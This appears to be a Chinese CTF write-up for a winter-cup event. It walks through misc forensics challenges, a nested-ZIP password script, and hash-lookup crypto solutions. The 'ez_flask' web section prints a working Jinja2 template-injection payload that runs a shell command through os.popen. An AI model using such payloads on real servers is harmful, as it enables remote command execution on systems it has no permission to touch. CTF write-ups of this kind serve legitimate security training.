2025i春秋冬季杯

Misc

See anything in these pics?

最开始Aztec码解密得到5FIVE

用来去解压缩包

之后得到一张图片

010查看末尾多出来一张图片,手动分离

拖入随波逐流即可得到

image-20250117172217382

简单镜像提取

流量包中看到一个压缩包,原始数据提出来得到

image-20250117172353579

还原为压缩包

image-20250117172419231

得到一个镜像,根据题目描述RR_studio

想到RStudio

用RStudio打开恢复数据找到flag

image-20250117172648100

压力大,写个脚本吧

压缩包里给的密码经base64解码后即为压缩包密码

写个脚本批量解压,后面得到hint,提示password+password.png

把密码拼起来得到一张图片

import zipfile
import os
import base64
import re


def decode_password_from_file(filepath):
    """Read a Base64-encoded password from a text file and return it decoded.

    Args:
        filepath: Path of the text file holding the Base64 string.

    Returns:
        The decoded password as ``str``, or ``None`` when reading or decoding
        fails (the error is printed rather than raised).
    """
    try:
        with open(filepath, 'r') as handle:
            raw_text = handle.read()
        # Surrounding whitespace/newlines are not part of the Base64 payload.
        return base64.b64decode(raw_text.strip()).decode()
    except Exception as err:
        print(f"密码解码失败: {err}")
        return None


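def decompress_zip(zip_file, password):
    """Extract a password-protected ZIP next to itself and locate the next archive.

    Args:
        zip_file: Path of the archive to extract.
        password: Archive password as ``str``; it is encoded to bytes for
            ``zipfile``.

    Returns:
        Path of the first member ending in ``.zip`` (joined onto the archive's
        directory) that stays inside that directory, or ``None`` if there is
        none or extraction fails (the error is printed rather than raised).
    """
    folder = os.path.dirname(zip_file)
    # abspath('') resolves to the current directory, matching extractall(path='').
    base_dir = os.path.abspath(folder)

    try:
        with zipfile.ZipFile(zip_file) as archive:
            # NOTE: extractall() enforces no size limit; only run this on
            # archives you are prepared to unpack in full.
            archive.extractall(path=folder, pwd=password.encode())
            files_in_zip = archive.namelist()
    except Exception as err:
        print(f"解压过程中出现错误: {err}")
        return None

    for member in files_in_zip:
        if not member.endswith('.zip'):
            continue
        candidate = os.path.join(folder, member)
        # Member names come from the archive itself. extractall() strips
        # absolute prefixes and ".." components before writing, but namelist()
        # returns the raw names, so a raw name can point outside the
        # extraction directory at a file that was never extracted there.
        try:
            inside = os.path.commonpath([base_dir, os.path.abspath(candidate)]) == base_dir
        except ValueError:
            # e.g. paths on different drives: treat as outside.
            inside = False
        if inside:
            return candidate
    return None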


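def retrieve_passwords(starting_zip):
    """Walk a chain of nested ZIP archives and collect each layer's password.

    For every archive, the first run of digits in its file name selects the
    matching ``password_<n>.txt`` file (looked up relative to the current
    working directory). The decoded password is recorded and used to extract
    the archive, and the walk continues with the ZIP found inside.

    Args:
        starting_zip: Path of the outermost archive.

    Returns:
        The decoded passwords in the order the archives were opened. The walk
        stops early (returning what was gathered so far) on a repeated
        archive, a file name without digits, a missing or undecodable
        password file, or when no further archive is found.
    """
    current_zip = starting_zip
    gathered_passwords = []
    processed_files = set()

    while current_zip and os.path.exists(current_zip):
        # An archive that contains a ZIP with its own name would loop forever.
        if current_zip in processed_files:
            print(f"警告: 检测到重复的ZIP文件 {current_zip},停止处理")
            break
        processed_files.add(current_zip)

        # The archive name is not guaranteed to contain a number; without this
        # guard re.search() returns None and .group() raises AttributeError.
        number_match = re.search(r'(\d+)', os.path.basename(current_zip))
        if number_match is None:
            print(f"无法从文件名提取编号: {current_zip},停止处理")
            break
        password_filename = f'password_{number_match.group(1)}.txt'

        if not os.path.exists(password_filename):
            print(f"未找到密码文件: {password_filename},停止处理")
            break

        print(f"处理ZIP文件: {current_zip}")
        print(f"使用密码文件: {password_filename}")

        password = decode_password_from_file(password_filename)
        if not password:
            break
        gathered_passwords.append(password)
        print(f"解码的密码: {password}")

        next_zip = decompress_zip(current_zip, password)
        if not next_zip:
            print("没有找到更多的ZIP文件,解压结束")
            break
        print(f"发现新的ZIP文件: {next_zip}")
        current_zip = next_zip

    return gathered_passwords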


def sanitize_password(password):
    """Return *password* with every non-hexadecimal character dropped, order kept."""
    hex_digits = '0123456789ABCDEFabcdef'
    kept = []
    for symbol in password:
        if symbol in hex_digits:
            kept.append(symbol)
    return ''.join(kept)


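def generate_png_from_passwords(passwords, output_filename="flag.png"):
    """Rebuild a binary file from the hex fragments carried in the passwords.

    The passwords are taken in reverse order, reduced to their hexadecimal
    digits, concatenated, and written out as raw bytes.

    Args:
        passwords: Password strings in the order they were collected. The
            list is not modified.
        output_filename: Where the decoded bytes are written.

    Returns:
        ``True`` if the file was written, ``False`` if decoding or writing
        failed (the error is printed rather than raised).
    """
    print("\n清理密码并拼接:")
    # reversed() rather than list.reverse(): the caller's list stays untouched.
    hex_data = ''.join(sanitize_password(pwd) for pwd in reversed(passwords))

    print("\n拼接后的十六进制数据:")
    print(hex_data)

    print(f"最终的十六进制数据长度: {len(hex_data)}")

    try:
        if len(hex_data) % 2 != 0:
            # bytes.fromhex() needs whole bytes; drop the dangling nibble.
            hex_data = hex_data[:-1]

        binary_data = bytes.fromhex(hex_data)
        with open(output_filename, "wb") as file:
            file.write(binary_data)

        print(f"PNG文件生成成功: {output_filename}")
        return True
    except Exception as err:
        print(f"创建PNG时出错: {err}")
        return False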


def execute():
    """Entry routine: unpack the archive chain from ``zip_99.zip`` and write ``flag.png``."""
    initial_zip = "zip_99.zip"
    print(f"开始处理ZIP文件: {initial_zip}")

    passwords = retrieve_passwords(initial_zip)
    if not passwords:
        # Nothing was decoded, so there is no data to assemble.
        print("\n没有收集到密码,处理失败。")
        return

    print("\n生成PNG文件中...")
    succeeded = generate_png_from_passwords(passwords)
    if succeeded:
        print("\n处理完毕!请检查生成的flag.png文件")
    else:
        print("\nPNG文件生成失败!")


# Run the extraction pipeline only when this file is executed as a script,
# not when it is imported.
if __name__ == "__main__":
    execute()

Web

file copy

工具秒了

da110b8bdbcb670ee3b4c3fe8591d45d

ez_flask

题目是Flask/Jinja2模板注入(SSTI),用fenjing就可以

payload

{{cycler.next.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}

Crypto

你是小哈斯?

题目给了一组SHA-1哈希值(SHA-1是散列而不是加密)

挨个查表还原会发现规律:每个哈希值对应单个字符

写个脚本对应起来

import hashlib
import string

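# Candidate plaintexts: every single character typeable on a keyboard
# (letters, digits, punctuation and whitespace).
keyboard_chars = string.ascii_letters + string.digits + string.punctuation + string.whitespace

# SHA-1 digests supplied by the challenge, in message order.
hash_list = [
    "356a192b7913b04c54574d18c28d46e6395428ab",
    "da4b9237bacccdf19c0760cab7aec4a8359010b0",
    "77de68daecd823babbb58edb1c8e14d7106e83bb",
    "1b6453892473a467d07372d45eb05abc2031647a",
    "ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4",
    "c1dfd96eea8cc2b62785275bca38ac261256e278",
    "902ba3cda1883801594b6e1b452790cc53948fda",
    "fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f",
    "0ade7c2cf97f75d009975f4d720d1fa6c19f4897",
    "b6589fc6ab0dc82cf12099d1c2d40ab994e8410c",
    "3bc15c8aae3e4124dd409035f32ea2fd6835efc9",
    "21606782c65e44cac7afbb90977d8b6f82140e76",
    "22ea1c649c82946aa6e479e1ffd321e4a318b1b0",
    "aff024fe4ab0fece4091de044c58c9ae4233383a",
    "58e6b3a414a1e090dfc6029add0f3555ccba127f",
    "4dc7c9ec434ed06502767136789763ec11d2c4b7",
    "8efd86fb78a56a5145ed7739dcb00c78581c5375",
    "95cb0bfd2977c761298d9624e4b4d4c72a39974a",
    "51e69892ab49df85c6230ccc57f8e1d1606caccc",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "7a81af3e591ac713f81ea1efe93dcf36157d8376",
    "516b9783fca517eecbd1d064da2d165310b19759",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
    "d1854cae891ec7b29161ccaf79a24b00c274bdaa",
    "7a81af3e591ac713f81ea1efe93dcf36157d8376",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "c2b7df6201fdd3362399091f0a29550df3505b6a",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "3c363836cf4e16666669a25da280a1865c2d2874",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "27d5482eebd075de44389774fce28c69f45c8a75",
    "5c2dd944dde9e08881bef0894fe7b22a5c9c4b06",
    "13fbd79c3d390e5d6585a21e11ff5ec1970cff0c",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "395df8f7c51f007019cb30201c49e884b46b92fa",
    "11f6ad8ec52a2984abaafd7c3b516503785c2072",
    "84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
    "7a38d8cbd20d9932ba948efaa364bb62651d5ad4",
    "e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
    "d1854cae891ec7b29161ccaf79a24b00c274bdaa",
    "6b0d31c0d563223024da45691584643ac78c96e8",
    "5c10b5b2cd673a0616d529aa5234b12ee7153808",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "6b0d31c0d563223024da45691584643ac78c96e8",
    "58e6b3a414a1e090dfc6029add0f3555ccba127f",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
    "22ea1c649c82946aa6e479e1ffd321e4a318b1b0",
    "e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
    "11f6ad8ec52a2984abaafd7c3b516503785c2072",
    "95cb0bfd2977c761298d9624e4b4d4c72a39974a",
    "395df8f7c51f007019cb30201c49e884b46b92fa",
    "c2b7df6201fdd3362399091f0a29550df3505b6a",
    "3a52ce780950d4d969792a2559cd519d7ee8c727",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "3c363836cf4e16666669a25da280a1865c2d2874",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "27d5482eebd075de44389774fce28c69f45c8a75",
    "5c2dd944dde9e08881bef0894fe7b22a5c9c4b06",
    "13fbd79c3d390e5d6585a21e11ff5ec1970cff0c",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "395df8f7c51f007019cb30201c49e884b46b92fa",
    "11f6ad8ec52a2984abaafd7c3b516503785c2072",
    "84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
    "7a38d8cbd20d9932ba948efaa364bb62651d5ad4",
    "e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
    "d1854cae891ec7b29161ccaf79a24b00c274bdaa",
    "6b0d31c0d563223024da45691584643ac78c96e8",
    "5c10b5b2cd673a0616d529aa5234b12ee7153808",
    "3a52ce780950d4d969792a2559cd519d7ee8c727",
    "22ea1c649c82946aa6e479e1ffd321e4a318b1b0",
    "aff024fe4ab0fece4091de044c58c9ae4233383a",
    "58e6b3a414a1e090dfc6029add0f3555ccba127f",
    "4dc7c9ec434ed06502767136789763ec11d2c4b7",
    "8efd86fb78a56a5145ed7739dcb00c78581c5375",
    "95cb0bfd2977c761298d9624e4b4d4c72a39974a",
    "51e69892ab49df85c6230ccc57f8e1d1606caccc",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "7a81af3e591ac713f81ea1efe93dcf36157d8376",
    "516b9783fca517eecbd1d064da2d165310b19759",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
    "d1854cae891ec7b29161ccaf79a24b00c274bdaa",
    "7a81af3e591ac713f81ea1efe93dcf36157d8376",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "c2b7df6201fdd3362399091f0a29550df3505b6a",
    "356a192b7913b04c54574d18c28d46e6395428ab",
    "da4b9237bacccdf19c0760cab7aec4a8359010b0",
    "77de68daecd823babbb58edb1c8e14d7106e83bb",
    "1b6453892473a467d07372d45eb05abc2031647a",
    "ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4",
    "c1dfd96eea8cc2b62785275bca38ac261256e278",
    "902ba3cda1883801594b6e1b452790cc53948fda",
    "fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f",
    "0ade7c2cf97f75d009975f4d720d1fa6c19f4897",
    "b6589fc6ab0dc82cf12099d1c2d40ab994e8410c",
    "3bc15c8aae3e4124dd409035f32ea2fd6835efc9",
    "21606782c65e44cac7afbb90977d8b6f82140e76",
]

# Lookup table digest -> character. An unsalted SHA-1 over a one-character
# input has only as many possible outputs as there are candidate characters,
# so the whole space fits in a small dictionary and the digests provide no
# confidentiality.
sha1_dict = {hashlib.sha1(char.encode()).hexdigest(): char for char in keyboard_chars}

# Map each digest back to its character; '?' marks a digest outside the table.
matched_chars = [sha1_dict.get(sha1_hash, '?') for sha1_hash in hash_list]

# Join the recovered characters into the final message.
result_string = ''.join(matched_chars)

print("Matched characters:", result_string)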

image-20250117171807678

flag:flag{game_cqb_isis_cxyz}

通往哈希的旅程

ca12fd8250972ec363a16593356abb1f3cf3a16d

在cmd5上查表反查该哈希即可得到18876011645